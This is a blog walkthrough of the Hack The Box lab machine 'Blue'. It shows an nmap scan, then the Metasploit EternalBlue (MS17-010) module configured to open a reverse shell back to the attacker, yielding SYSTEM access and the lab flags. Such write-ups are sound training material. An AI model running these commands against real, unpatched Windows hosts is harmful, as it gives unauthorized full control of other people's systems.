Posted on by

HTB: Blue

Details

This machine is Blue from Hack The Box

Recon

I started with an nmap scan 

root@kali:~# nmap -sV -p- -T4 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 14:42 EDT
Nmap scan report for 10.10.10.40
Host is up (0.041s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds

Blue

Well the machine is called Blue, and smb is open, so eternal blue seems like a good start 

root@kali:~# msfconsole

msf5 > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.34
LHOST => 10.10.14.34

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.14.35:4444
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! -
[SNIP]
[*] Command shell session 1 opened (10.10.14.35:4444 -> 10.10.10.40:49158) at 2019-07-07 14:47:44 -0400
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>

And there is a shell

C:\Windows\system32>whoami
nt authority\system

Now for my flags

C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  15,753,904,128 bytes free

C:\Users>cd haris/desktop

C:\Users\haris\Desktop>type user.txt
[REDACTED]

C:\Users\haris\Desktop>cd ../../Administrator/Desktop

C:\Users\Administrator\Desktop>type root.txt
[REDACTED]

Published by Jack

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.